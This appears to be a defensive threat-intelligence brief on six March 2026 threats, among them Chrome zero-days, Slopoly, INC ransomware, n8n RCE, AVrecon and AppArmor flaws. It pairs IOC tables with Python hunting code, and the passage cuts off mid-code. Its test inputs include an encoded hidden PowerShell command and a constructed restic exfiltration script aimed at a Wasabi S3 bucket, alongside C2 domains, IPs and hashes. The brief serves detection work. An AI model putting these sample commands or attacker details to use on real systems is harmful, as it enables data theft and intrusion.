Cyber Threat Brief — March 14 2026
1. Google Chrome Zero-Days Actively Exploited (CVE-2026-3909 & CVE-2026-3910)
Summary
Two Chrome zero-days hit CISA KEV on March 13; both were discovered March 10 and were already weaponized in the wild. CVE-2026-3909 is an out-of-bounds write in Skia (the 2D graphics library Chrome renders with; CWE-787), and CVE-2026-3910 is an improper restriction of operations within the bounds of a memory buffer in the V8 JavaScript engine (CWE-119). The Skia bug is the nastier of the two: an OOB write in the renderer lets an attacker overwrite adjacent memory, which in a browser context is the path to sandbox escape and arbitrary code execution on the victim host. Google has not attributed the attacks or shared exploitation details, but the vector is the one common to all browser renderer exploits: the victim visits a crafted page, the renderer processes the malicious content, and the exploit fires. Patch now.
What’s New (Last 24 Hours)
- CISA added both CVEs to the Known Exploited Vulnerabilities catalog on March 13, 2026 (due date: March 27)
- Google confirmed both flaws were discovered on March 10 and are being exploited in the wild
- Tenable confirmed the standard drive-by attack vector (crafted HTML page)
- Chrome stable channel update issued March 12, 2026
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| Crafted HTML page delivered via drive-by | TTP | T1203 (Exploitation for Client Execution) | Web proxy / browser telemetry | Alert on browser processes spawning unexpected child processes; look for chrome.exe or msedge.exe spawning cmd.exe, powershell.exe, or wscript.exe |
| Skia OOB write triggers renderer process crash or code exec | TTP | T1203 (Exploitation for Client Execution) | EDR process/crash telemetry | Monitor for abnormal child processes spawned from browser renderer processes (e.g., chrome renderer pid → shell) |
| Sandbox escape post-renderer compromise | TTP | T1611 (Escape to Host) | EDR process lineage | Detect renderer-origin process creation outside expected browser child process tree |
| chrome.exe or msedge.exe spawning unexpected child | Process pattern | T1059 (Command and Scripting Interpreter) | EDR process creation logs | Alert on browser process spawning cmd.exe, powershell.exe, wscript.exe, mshta.exe |
| Patch version gates: Chrome < 134.x (pre-March 12 build) | TTP | T1190 (Exploit Public-Facing Application) | Asset inventory / patch management | Hunt for unpatched Chrome versions in your environment using software inventory |
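The browser-to-shell lineage hunt from the table, as an added example that is not code from the brief or from Google; it assumes an EDR process-creation schema (pid, ppid, image, parent_image, cmdline) and runs over constructed sample events.

```python
"""Flag browser processes spawning shells or script hosts.

Added example, not code from the brief or from Google: a process-lineage rule
over constructed EDR-style process-creation events that implements the
"chrome.exe or msedge.exe spawning cmd.exe / powershell.exe / wscript.exe /
mshta.exe" hunt above. The ProcEvent fields are an assumed telemetry schema.
"""
from dataclasses import dataclass
from typing import List, Tuple

BROWSERS = {"chrome.exe", "msedge.exe"}
# The four children named in the table plus pwsh.exe and cscript.exe (added here).
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe",
                       "wscript.exe", "cscript.exe", "mshta.exe"}

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str          # full path of the new process
    parent_image: str   # full path of its parent
    cmdline: str

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def is_suspicious_browser_child(ev: ProcEvent) -> bool:
    """True when a browser process directly spawns a shell or script host."""
    return (_basename(ev.parent_image) in BROWSERS
            and _basename(ev.image) in SUSPICIOUS_CHILDREN)

def detect(events: List[ProcEvent]) -> List[Tuple[ProcEvent, str]]:
    """Return (event, origin) hits. origin says whether the parent was a
    sandboxed renderer (a shell child there is the post-exploitation signal
    the table describes) or the browser's main process."""
    by_pid = {ev.pid: ev for ev in events}
    hits = []
    for ev in events:
        if not is_suspicious_browser_child(ev):
            continue
        parent = by_pid.get(ev.ppid)
        renderer = parent is not None and "--type=renderer" in parent.cmdline
        hits.append((ev, "renderer-origin" if renderer else "browser-origin"))
    return hits

# Constructed sample: browser -> renderer (normal), renderer -> powershell with
# an encoded command line (the hunt's hit), explorer -> cmd (out of scope).
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
SAMPLE_EVENTS = [
    ProcEvent(4120, 3100, CHROME, CHROME, "chrome.exe --type=renderer --lang=en-US"),
    ProcEvent(5200, 4120, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              CHROME, "powershell.exe -nop -w hidden -enc <base64-placeholder>"),
    ProcEvent(5300, 2000, r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\explorer.exe", "cmd.exe /c dir"),
]

if __name__ == "__main__":
    for ev, origin in detect(SAMPLE_EVENTS):
        print(f"ALERT {origin}: pid={ev.pid} {_basename(ev.parent_image)} -> {ev.cmdline}")
```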
Potential Detection Coverage Based on MITRE ATT&CK Technique
| Source | Detections | Coverage |
|---|---|---|
| Splunk | None found for Chrome/Skia/V8 specifically | No direct Splunk ESCU rules for this Chrome renderer exploitation chain; monitor for browser child process anomalies via Endpoint data model |
| Elastic | Suspicious Browser Child Process | Fires on browser processes (Chrome, Safari, Firefox) spawning suspicious child processes — directly covers post-exploitation child process creation after renderer sandbox escape |
| Sigma | Suspicious Browser Child Process - MacOS | Detects browser processes spawning unexpected children on macOS; maps directly to sandbox escape TTP where attacker pivots from browser renderer to system process |
2. Hive0163 Slopoly: AI-Generated Backdoor in Active Ransomware Campaigns
Summary
IBM X-Force published analysis of Slopoly, an AI-assisted PowerShell backdoor deployed by Hive0163 (the group behind Interlock ransomware). Attacks start with ClickFix social engineering: victim executes a crafted PowerShell command, drops NodeSnake, which retrieves Interlock RAT, which then deploys Slopoly for persistent post-exploitation access. Slopoly is a full-featured C2 client written in PowerShell — beacons system info every 30 seconds, polls for commands every 50 seconds, executes via cmd.exe, and was active for more than a week before detection. The “AI-assisted” angle is real but not scary: AI made the code cleaner and faster to write, not more sophisticated. The TTPs are classic ransomware pre-positioning.
What’s New (Last 24 Hours)
- IBM X-Force published full Slopoly analysis (March 13, 2026)
- Confirmed attack chain: ClickFix → NodeSnake → Interlock RAT → Slopoly → Interlock Ransomware
- Slopoly persistence: scheduled task named “Runtime Broker” run from C:\ProgramData\Microsoft\Windows\Runtime\
- Slopoly C2 beacon: heartbeat every 30s, command poll every 50s; received commands executed via cmd.exe
- Hive0163 also using initial access brokers TA569 (SocGholish) and TAG-124 (KongTuke/LandUpdate808)
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| C:\ProgramData\Microsoft\Windows\Runtime\ | File path | T1547.001 (Registry Run Keys / Startup Folder) | EDR file system telemetry | Alert on new PowerShell script creation in this path; Slopoly drops here |
| Scheduled task named “Runtime Broker” | Scheduled task name | T1053.005 (Scheduled Task/Job: Scheduled Task) | Windows Security Event Log (Event ID 4698/4702) | Hunt for scheduled tasks named “Runtime Broker” not created by SYSTEM from known-good paths |
| PowerShell beacon: 30s heartbeat, 50s command poll via cmd.exe | TTP | T1059.001 (PowerShell) | EDR process creation / network telemetry | Hunt for powershell.exe making periodic outbound HTTP connections at ~30–50s intervals; look for powershell spawning cmd.exe repeatedly |
| ClickFix: user executes crafted PowerShell from browser/clipboard | TTP | T1204.001 (User Execution: Malicious Link) | EDR process creation (parent: browser → powershell) | Detect browser process or Run dialog spawning powershell.exe with encoded/long command line |
| NodeSnake (first-stage loader) | TTP | T1105 (Ingress Tool Transfer) | EDR / network proxy | Alert on powershell.exe downloading and executing additional payloads shortly after ClickFix interaction |
| Base64-encoded PowerShell command string at initial execution | Command pattern | T1027 (Obfuscated Files or Information) | EDR command line telemetry | Hunt for powershell.exe -enc or -EncodedCommand with long base64 payloads spawned from browser processes |
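Two of the hunts in the table, the “Runtime Broker” task check and the 30 s / 50 s beacon cadence, as an added example that is not code from IBM X-Force; it assumes normalised 4698 and network-connection event fields (TaskName, TaskContent, ts, image, dest) and runs over constructed sample data.

```python
"""Hunt for Slopoly-style persistence and beaconing.

Added example, not code from the IBM X-Force report. suspicious_task checks
Windows 4698 scheduled-task-creation events for the "Runtime Broker" name or
an action under C:\ProgramData\Microsoft\Windows\Runtime\; beacon_candidates
finds powershell.exe connections repeating at ~30 s or ~50 s. The event field
names are assumptions and the c2.example/update.example traffic is constructed.
"""
import re
import statistics
from collections import defaultdict

TASK_NAME = "runtime broker"   # trades on the legitimate RuntimeBroker.exe name
DROP_DIR = "c:\\programdata\\microsoft\\windows\\runtime\\"
BEACON_PERIODS = (30.0, 50.0)  # heartbeat / command-poll intervals from the report
TOLERANCE = 0.15               # median gap within +/-15 % of a known period
MAX_JITTER = 0.2               # pstdev/median; real beacons are very regular

def suspicious_task(ev: dict) -> bool:
    """4698 event: flag by task name or by the action's executable path."""
    name = ev.get("TaskName", "").rsplit("\\", 1)[-1].lower()
    m = re.search(r"<command>([^<]+)</command>", ev.get("TaskContent", "").lower())
    path = m.group(1).strip().strip('"') if m else ""
    return name == TASK_NAME or path.startswith(DROP_DIR)

def beacon_candidates(conns: list) -> dict:
    """Return {destination: median gap in seconds} for periodic powershell traffic.
    Series are keyed on the full URL so the heartbeat and the command poll,
    which hit different endpoints, are measured separately. ts is epoch seconds."""
    series = defaultdict(list)
    for c in conns:
        if c["image"].lower().endswith("powershell.exe"):
            series[c["dest"]].append(float(c["ts"]))
    hits = {}
    for dest, times in series.items():
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        if len(gaps) < 4:
            continue                       # too few samples to call it periodic
        med = statistics.median(gaps)
        if med == 0:
            continue
        jitter = statistics.pstdev(gaps) / med
        if jitter < MAX_JITTER and any(abs(med - p) <= p * TOLERANCE for p in BEACON_PERIODS):
            hits[dest] = round(med, 1)
    return hits

def _conns(image: str, dest: str, ts_list) -> list:
    return [{"ts": t, "image": image, "dest": dest} for t in ts_list]

# Constructed sample: a 30 s heartbeat, a 50 s poll, and irregular update traffic.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_CONNS = (_conns(PS, "http://c2.example/beat", [0, 30, 61, 90, 120, 151])
                + _conns(PS, "http://c2.example/tasks", [5, 55, 105, 156, 205, 255])
                + _conns(PS, "https://update.example/", [0, 7, 300, 305, 900]))
```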
Potential Detection Coverage Based on MITRE ATT&CK Technique
3. INC Ransomware: Standardized Pre-Encryption Exfiltration Playbook Exposed
Summary
Huntress analysts documented two near-identical INC ransomware intrusions (Feb 9 and Feb 25, 2026), reconstructing the group’s standardized exfiltration playbook. The TL;DR: PsExec for privilege escalation, a scheduled task called “Recovery Diagnostics” running base64-encoded PowerShell, a renamed Restic binary (disguised as winupdate.exe) exfiltrating to a Wasabi S3 bucket with hardcoded credentials, then a methodical sweep of security tools (VIPRE uninstaller, Windows Defender disabled, Acronis killed with HRSword) before launching INC ransomware disguised as win.exe. Identical cloud credentials across both incidents mean the infrastructure is attributable.
What’s New (Last 24 Hours)
- Huntress published IR report with hashes and exfiltration infrastructure details (March 13, 2026)
- SHA256 hashes confirmed: 1d15b57db62c079fc6274f8ea02ce7ec3d6b158834b142f5345db14f16134f0d (edr.exe) and e034a4c00f168134900bfe235ff2f78daf8bfcfa8b594cd2dd563d43f5de1b13 (win.exe)
- Exfiltration destination: Wasabi S3 bucket; hardcoded password literally “password”
- Scheduled task “Recovery Diagnostics” used for persistence across both incidents
- Identical cloud credentials across Jan 22, Feb 9, and Feb 25 incidents confirm same threat actor
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| 1d15b57db62c079fc6274f8ea02ce7ec3d6b158834b142f5345db14f16134f0d | File hash (SHA256) | T1562.001 (Impair Defenses: Disable or Modify Tools) | EDR file hash telemetry | Block/alert on this hash — confirmed edr.exe security tool disabler |
| e034a4c00f168134900bfe235ff2f78daf8bfcfa8b594cd2dd563d43f5de1b13 | File hash (SHA256) | T1486 (Data Encrypted for Impact) | EDR file hash telemetry | Block/alert on this hash — confirmed INC ransomware dropper win.exe |
| winupdate.exe (renamed Restic backup utility) | Process name | T1036.005 (Masquerading: Match Legitimate Name) | EDR process telemetry | Hunt for processes named winupdate.exe where binary is NOT signed by Microsoft or Restic; Restic has known PE characteristics |
| Scheduled task “Recovery Diagnostics” | Scheduled task name | T1053.005 (Scheduled Task/Job: Scheduled Task) | Windows Security Event Log (4698/4702) | Alert on scheduled task creation with this exact name; used for persistence + payload execution in both incidents |
| Base64-encoded PowerShell configuring Wasabi S3 env vars | Command pattern | T1059.001 (PowerShell) | EDR command line telemetry | Hunt powershell.exe -enc commands referencing S3/Wasabi environment variables (WASABI_*, AWS_* combined with restic CLI patterns) |
| PsExec execution for lateral movement / privilege escalation | Process + parent | T1569.002 (System Services: Service Execution) | EDR process creation / Windows Security logs | Alert on psexec.exe (or PSEXESVC service) creation; monitor for non-admin accounts running PsExec |
| HRSword.exe (Acronis killer) | Process name | T1562.001 (Impair Defenses: Disable or Modify Tools) | EDR process creation | Hunt for HRSword.exe execution; known security tool terminator used specifically by this INC cluster |
| Wasabi S3 exfiltration destination | Network artifact | T1048 (Exfiltration Over Alternative Protocol) | Network proxy / firewall | Alert on outbound HTTPS connections to s3.wasabisys.com from endpoints (especially paired with Restic-style backup command patterns) |
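The encoded-PowerShell hunt from the table above, as an added example that is not Huntress code: it decodes -EncodedCommand payloads (UTF-16LE base64) and matches restic/Wasabi indicators; the sample command line is constructed with placeholder bucket, key and path values.

```python
"""Decode PowerShell -EncodedCommand payloads and look for Restic/Wasabi exfil setup.

Added example, not code from Huntress. It implements the "powershell.exe -enc
referencing WASABI_*/AWS_* variables plus restic CLI patterns" hunt above over
constructed command lines. The variable names are the ones restic's S3 backend
reads (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, RESTIC_REPOSITORY,
RESTIC_PASSWORD); bucket, key and path values in the sample are placeholders.
"""
import base64
import re
from typing import Dict, List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENC_FLAG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
INDICATORS = {
    "wasabi_endpoint": re.compile(r"(?i)wasabisys\.com"),
    "s3_credentials": re.compile(r"(?i)\b(AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY|WASABI_\w+)\b"),
    "restic_repo": re.compile(r"(?i)\bRESTIC_(REPOSITORY|PASSWORD)\b"),
    "renamed_restic": re.compile(r"(?i)\bwinupdate\.exe\b.*(\bbackup\b|\binit\b|\s-r\s+s3:)"),
}

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script, or None when there is no valid -enc payload."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None      # malformed payload: leave it to a generic obfuscation rule

def matched_indicators(script: str) -> List[str]:
    return [name for name, rx in INDICATORS.items() if rx.search(script)]

def hunt(cmdline: str) -> Dict:
    """Decode if encoded, otherwise inspect the plaintext command line."""
    script = decode_encoded_command(cmdline)
    return {"encoded": script is not None,
            "indicators": matched_indicators(cmdline if script is None else script)}

def to_encoded_command(script: str) -> str:
    """The transform -EncodedCommand expects (UTF-16LE, then base64); only used
    here to build the constructed test input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed test input carrying the indicators the hunt looks for.
SAMPLE_SCRIPT = ('$env:AWS_ACCESS_KEY_ID="PLACEHOLDERKEY"; $env:AWS_SECRET_ACCESS_KEY="password"; '
                 '$env:RESTIC_REPOSITORY="s3:s3.wasabisys.com/placeholder-bucket"; '
                 '$env:RESTIC_PASSWORD="password"; C:\\Windows\\Temp\\winupdate.exe backup D:\\Shares')
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc " + to_encoded_command(SAMPLE_SCRIPT)
```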
Potential Detection Coverage Based on MITRE ATT&CK Technique
| Source | Detections | Coverage |
|---|---|---|
| Splunk | Scheduled Task Deleted Or Created via CMD, Suspicious Scheduled Task from Public Directory, Windows PowerShell ScheduleTask, Randomly Generated Scheduled Task Name | Strong coverage for T1053.005 — “Recovery Diagnostics” task creation via PowerShell or CMD will trigger multiple rules; the scheduled task from public/temp directory rule may trigger if task payload path is outside system dirs |
| Elastic | None found | No direct Elastic rules for Restic-based exfiltration or INC ransomware; general exfiltration anomaly rules may trigger on Wasabi S3 connections |
| Sigma | None found for Restic/INC specifically | No Sigma rules in current corpus specifically for renamed Restic or Wasabi exfiltration; hunt queries against process creation logs for winupdate.exe + Restic binary attributes recommended |
4. n8n Expression Injection RCE — CISA KEV, 24,700 Instances Still Exposed
Summary
CISA added CVE-2025-68613 to KEV on March 11, 2026. The flaw is an expression injection in n8n’s workflow automation platform — an authenticated attacker can inject code into the workflow expression evaluator and achieve RCE with the privileges of the n8n process. CVSS 9.9. Patched in December 2025 (versions 1.120.4, 1.121.1, 1.122.0), but as of early February, Shadowserver still counted 24,700+ unpatched instances online (12,300+ in North America). A companion flaw CVE-2026-27577 (CVSS 9.4) was also disclosed as a related bypass. FCEB agencies must patch by March 25.
What’s New (Last 24 Hours)
- CISA KEV addition confirmed March 11; widespread reporting March 13-14
- Shadowserver data shows 24,607 unpatched instances as of Feb 5, 2026 — exposure window still large
- CVE-2026-27577 disclosed as additional bypass following CVE-2025-68613 patch
- No public PoC or exploitation details released; attack requires authentication
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| n8n workflow API endpoint receiving expression evaluation requests | TTP | T1190 (Exploit Public-Facing Application) | Web/application server logs | Monitor n8n API logs for unusual expression payloads; look for system-level commands, env variable access, or file reads in workflow expressions |
| n8n process spawning unexpected child processes post-exploitation | TTP | T1059 (Command and Scripting Interpreter) | EDR process creation (parent: n8n node process) | Alert on node.js (n8n) spawning shell commands — sh -c, bash, cmd.exe, or Python execution |
| n8n versions < 1.120.4, < 1.121.1, < 1.122.0 | Patch version gate | T1190 (Exploit Public-Facing Application) | Asset/software inventory | Immediately enumerate n8n instances in your environment; prioritize external-facing deployments |
| Authenticated API abuse via workflow expression endpoint | TTP | T1078 (Valid Accounts) | Application authentication logs | Audit n8n user accounts; restrict who can create/edit workflows; monitor for new workflow creation by unusual accounts |
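A version gate for the inventory check in the table, as an added example that is not n8n or CISA code: the brief names one fixed release per minor line (1.120.4, 1.121.1, 1.122.0), so a single "less than 1.122.0" comparison would misclassify patched 1.120.x and 1.121.x hosts. It assumes semver-style version strings with an optional pre-release suffix and placeholder hostnames, and covers only CVE-2025-68613, since the brief gives no fixed version for CVE-2026-27577.

```python
"""Gate inventoried n8n versions against the CVE-2025-68613 fixed releases.

Added example, not code from n8n or CISA. The fixed releases are 1.120.4,
1.121.1 and 1.122.0, one per minor line, so each line is compared separately.
Pre-release suffix handling (e.g. 1.121.1-rc.1, an assumed format) and the
hostnames are assumptions; the later bypass CVE-2026-27577 is not covered.
"""
import re
from typing import Dict, List, Tuple

FIXED = [(1, 120, 4), (1, 121, 1), (1, 122, 0)]
VERSION_RE = re.compile(r"v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.]+))?")

def parse_version(v: str) -> Tuple[int, int, int, int]:
    m = VERSION_RE.fullmatch(v.strip())
    if not m:
        raise ValueError(f"unparseable n8n version: {v!r}")
    major, minor, patch = (int(m.group(i)) for i in (1, 2, 3))
    pre = -1 if m.group(4) else 0          # a pre-release ranks below its release
    return major, minor, patch, pre

def is_patched(v: str) -> bool:
    major, minor, patch, pre = parse_version(v)
    for fmaj, fmin, fpatch in FIXED:
        if (major, minor) == (fmaj, fmin):     # on a line that received a fix
            return (patch, pre) >= (fpatch, 0)
    newest_major, newest_minor, _ = max(FIXED)
    # Off the fixed lines: later lines contain the fix, earlier ones do not.
    return (major, minor) > (newest_major, newest_minor)

def triage(inventory: Dict[str, str]) -> Dict[str, List[str]]:
    """Split {host: version} into patched / vulnerable / unknown buckets."""
    out = {"patched": [], "vulnerable": [], "unknown": []}
    for host, version in inventory.items():
        try:
            out["patched" if is_patched(version) else "vulnerable"].append(host)
        except ValueError:
            out["unknown"].append(host)     # e.g. "latest" from a container tag
    return out

# Constructed inventory; hostnames are placeholders.
SAMPLE_INVENTORY = {"n8n-a": "1.121.0", "n8n-b": "v1.122.3",
                    "n8n-c": "1.120.4", "n8n-d": "latest"}
```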
Potential Detection Coverage Based on MITRE ATT&CK Technique
| Source | Detections | Coverage |
|---|---|---|
| Splunk | Confluence Pre-Auth RCE via OGNL Injection CVE-2023-22527 | Partial analogy — detection logic for expression/template injection in web apps; no n8n-specific rule exists; adapt pattern for n8n API endpoint monitoring |
| Elastic | None found | No n8n-specific Elastic rules; general process anomaly rules for node.js spawning shells would provide behavioral coverage |
| Sigma | None found | No Sigma rules for CVE-2025-68613; recommend creating custom rule monitoring n8n process tree for unexpected child process spawning |
5. SocksEscort / AVrecon Botnet Dismantled — Operation Lightning
Summary
Law enforcement across 9 countries (Europol-coordinated Operation Lightning) took down SocksEscort, a criminal proxy service that ran on top of the AVrecon botnet. SocksEscort had compromised approximately 369,000 routers and IoT devices across 163 countries since 2020; as of February 2026 about 8,000 infected routers were active (2,500 in the US). The botnet was powered by AVrecon malware, which Lumen Black Lotus Labs documented in 2023 — it targets SOHO routers via known RCE vulnerabilities (Cisco, D-Link, Hikvision, MikroTik, Netgear, TP-Link, Zyxel), establishes a SOCKS5 proxy, and phones home. Takedown removed 34 domains and 23 servers; $3.5M in crypto frozen. Residual IOCs still useful for hunting persistent infections.
What’s New (Last 24 Hours)
- Operation Lightning takedown announced March 13-14, 2026
- 34 domains and 23 servers seized; socksescort[.]com domain sinkholed
- AVrecon loader MD5: 007fe05132e429ff57393163354f4c90; AVrecon malware MD5: 444138b1d805808a06c4b908c7b73d96
- C2 domains: advstat[.]cc, meterstrack[.]cc
- C2 IPs: 188.138.125[.]163, 176.120.22[.]67
- C2 comms: ports 8000 and 8080 using hardcoded PING/PONG loop
- Europol stated infection vector: “vulnerability in residential modems of a specific brand”
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| advstat[.]cc | C2 domain | T1071.001 (Application Layer Protocol: Web) | DNS logs / proxy logs | Block and alert on DNS lookups or connections to this domain; still useful for hunting surviving infections |
| meterstrack[.]cc | C2 domain | T1071.001 (Application Layer Protocol: Web) | DNS logs / proxy logs | Block and alert; pair with netflow data for botnet C2 beacon patterns |
| 188.138.125[.]163 | C2 IP | T1090.002 (Proxy: External Proxy) | Firewall / netflow | Block outbound connections to this IP; alert on any existing sessions |
| 176.120.22[.]67 | C2 IP | T1090.002 (Proxy: External Proxy) | Firewall / netflow | Block outbound connections to this IP; correlate with router syslog for outbound TCP 8000/8080 |
| Outbound TCP 8000/8080 PING/PONG beacon pattern | Network behavior | T1071.001 (Application Layer Protocol: Web) | Firewall / netflow | Hunt for SOHO routers generating periodic outbound connections on ports 8000 or 8080 to external IPs |
| 007fe05132e429ff57393163354f4c90 | File hash (MD5) | T1542.001 (System Firmware) | Router/IoT firmware integrity | Use in threat intel platforms; scan for this hash in router firmware dumps or managed router telemetry |
| 444138b1d805808a06c4b908c7b73d96 | File hash (MD5) | T1542.001 (System Firmware) | Router/IoT firmware integrity | Same as above; pair with Shodan/Censys scans to identify still-infected devices in corporate IP space |
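The IOC matching from the table (domains, IPs, and the 8000/8080 router beacon lead), as an added example that is not code from the brief's sources; it assumes simple DNS and netflow record layouts and a 10.10.0.0/16 router range, and runs over constructed records.

```python
"""Match the AVrecon/SocksEscort indicators above against DNS and flow records.

Added example, not code from Europol, Lumen or the brief's sources. It refangs
the defanged C2 domains and IPs, then checks constructed DNS and netflow
records for C2 domain lookups, C2 IPs, and outbound TCP 8000/8080 from a
router range. The record layouts and the 10.10.0.0/16 router range are assumptions.
"""
import ipaddress
from typing import Dict, List

C2_DOMAINS = {"advstat[.]cc", "meterstrack[.]cc", "socksescort[.]com"}
C2_IPS = {"188.138.125[.]163", "176.120.22[.]67"}
BEACON_PORTS = {8000, 8080}                          # hardcoded PING/PONG loop ports
ROUTER_RANGE = ipaddress.ip_network("10.10.0.0/16")  # assumed SOHO/branch router space

def refang(ioc: str) -> str:
    """Turn the brief's defanged form back into a matchable value."""
    return ioc.replace("[.]", ".").replace("hxxp", "http").lower()

DOMAINS = {refang(d) for d in C2_DOMAINS}
IPS = {ipaddress.ip_address(refang(i)) for i in C2_IPS}

def is_c2_domain(name: str) -> bool:
    n = name.lower().rstrip(".")
    return any(n == d or n.endswith("." + d) for d in DOMAINS)

def check_dns(rec: Dict) -> List[str]:
    """rec: {"client": ip, "query": name, "answers": [ip, ...]}"""
    findings = []
    if is_c2_domain(rec["query"]):
        findings.append(f"c2-domain:{rec['query']}")
    for a in rec.get("answers", []):
        if ipaddress.ip_address(a) in IPS:
            findings.append(f"c2-ip-in-answer:{a}")
    return findings

def check_flow(rec: Dict) -> List[str]:
    """rec: {"src": ip, "dst": ip, "dport": int, "proto": "tcp"|"udp"}"""
    findings = []
    src, dst = ipaddress.ip_address(rec["src"]), ipaddress.ip_address(rec["dst"])
    if dst in IPS:
        findings.append(f"c2-ip:{dst}")
    # Weaker signal on its own: a router talking to the internet on 8000/8080.
    if (rec.get("proto") == "tcp" and rec["dport"] in BEACON_PORTS
            and src in ROUTER_RANGE and not dst.is_private):
        findings.append(f"router-beacon-port:{src}->{dst}:{rec['dport']}")
    return findings

def scan(dns: List[Dict], flows: List[Dict]) -> Dict[str, List[str]]:
    return {"dns": [f for r in dns for f in check_dns(r)],
            "flows": [f for r in flows for f in check_flow(r)]}

# Constructed sample records.
SAMPLE_DNS = [{"client": "10.10.0.7", "query": "advstat.cc", "answers": ["188.138.125.163"]},
              {"client": "10.10.0.7", "query": "www.example.org", "answers": []}]
SAMPLE_FLOWS = [{"src": "10.10.0.7", "dst": "176.120.22.67", "dport": 8080, "proto": "tcp"},
                {"src": "10.10.0.7", "dst": "10.10.255.1", "dport": 8080, "proto": "tcp"}]
```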
Potential Detection Coverage Based on MITRE ATT&CK Technique
| Source | Detections | Coverage |
|---|---|---|
| Splunk | None found for AVrecon/SocksEscort specifically | No direct ESCU rules for residential proxy botnet behavior; hunt via network telemetry using C2 IOCs above; Splunk Enterprise Security threat intel framework can ingest IOC blocklist |
| Elastic | None found | No Elastic rules for AVrecon; general network anomaly rules for SOHO device outbound traffic would require custom configuration |
| Sigma | APT User Agent | Partial — proxy UA rules cover some botnet C2 user agent patterns; not AVrecon-specific but provides baseline proxy traffic monitoring relevant to T1090.002 |
6. CrackArmor: Nine AppArmor Flaws Enable Linux Local Privilege Escalation to Root
Summary
Qualys TRU disclosed nine vulnerabilities in AppArmor (dubbed “CrackArmor”) affecting 12.6+ million enterprise Linux instances. The core flaw is a confused-deputy vulnerability: an unprivileged local user can manipulate AppArmor security profiles via pseudo-files, bypass user-namespace restrictions, and execute arbitrary kernel code — resulting in privilege escalation to root. Flaw dates to 2017 (kernel v4.11+). No CVEs assigned yet (intentional upstream kernel process delay). Ubuntu, Debian, and SUSE are affected by default. The Qualys team also documented DoS vectors: loading “deny-all” profiles against critical services and triggering recursive kernel stack exhaustion via deeply-nested subprofile removal. Working PoC exists internally at Qualys; public release withheld pending patches.
What’s New (Last 24 Hours)
- Qualys TRU published CrackArmor advisory March 12-13, 2026
- 9 vulnerabilities disclosed; PoC developed and shared with upstream kernel team under coordinated disclosure
- Attack vector: unprivileged local user → pseudo-file manipulation → AppArmor profile bypass → root
- Detection guidance: monitor /sys/kernel/security/apparmor/ for unauthorized profile modifications
- Mitigation: emergency kernel patching required; no effective interim workaround
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| /sys/kernel/security/apparmor/ pseudo-file manipulation | File path / TTP | T1068 (Exploitation for Privilege Escalation) | Linux auditd / file integrity monitoring | Monitor for writes/modifications to /sys/kernel/security/apparmor/ by non-root, non-admin processes; baseline normal AppArmor admin writes |
| Unprivileged user process accessing AppArmor profile pseudo-files | TTP | T1068 (Exploitation for Privilege Escalation) | Linux auditd (syscall audit, open/write on apparmor paths) | Alert on open(2) or write(2) syscalls targeting /sys/kernel/security/apparmor/ from UID > 0 |
| “Deny-all” profile loading for critical services (DoS path) | TTP | T1499 (Endpoint Denial of Service) | Linux auditd / AppArmor audit logs | Hunt for aa-enforce or profile load operations on system services outside expected admin windows |
| Kernel panic from recursive subprofile removal (stack exhaustion on x86-64) | TTP | T1499 (Endpoint Denial of Service) | System crash/kernel log (/var/log/kern.log, dmesg) | Alert on unexpected kernel panics on Linux hosts; correlate with preceding AppArmor profile operations |
| Linux kernel version < patched (v4.11–present, Ubuntu/Debian/SUSE default) | Patch gate | T1068 (Exploitation for Privilege Escalation) | Asset inventory / kernel version scan | Enumerate Linux hosts running AppArmor; prioritize cloud, Kubernetes, and edge instances for emergency kernel patching |
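An auditd-based check for the pseudo-file hunt in the table, as an added example that is not Qualys code: it joins SYSCALL and PATH records and flags write-capable opens of /sys/kernel/security/apparmor/ by a non-root euid. AUDIT_RULE is standard auditctl syntax but should be validated on your kernel, and the audit log lines are constructed.

```python
"""Alert on unprivileged write-capable opens of AppArmor's securityfs files.
Added example, not code from Qualys or the brief's sources: it joins auditd
SYSCALL/PATH records by serial and flags open/openat on
/sys/kernel/security/apparmor/ with O_WRONLY or O_RDWR from a non-root euid
(root's apparmor_parser is the expected writer). AUDIT_RULE is the auditctl
rule that would produce such records; the sample log lines are constructed."""
import re
from collections import defaultdict

APPARMOR_DIR = "/sys/kernel/security/apparmor/"
OPEN, OPENAT = 2, 257                 # x86-64 syscall numbers; flags sit in a1 / a2
O_WRONLY, O_RDWR = 0o1, 0o2
# write(2) carries no path, so audit write-capable opens of the pseudo-files instead.
AUDIT_RULE = ("-a always,exit -F arch=b64 -S open,openat "
              f"-F dir={APPARMOR_DIR} -F euid!=0 -k apparmor_profile")
KV = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_record(line: str) -> dict:
    rec = {k: v.strip('"') for k, v in KV.findall(line)}
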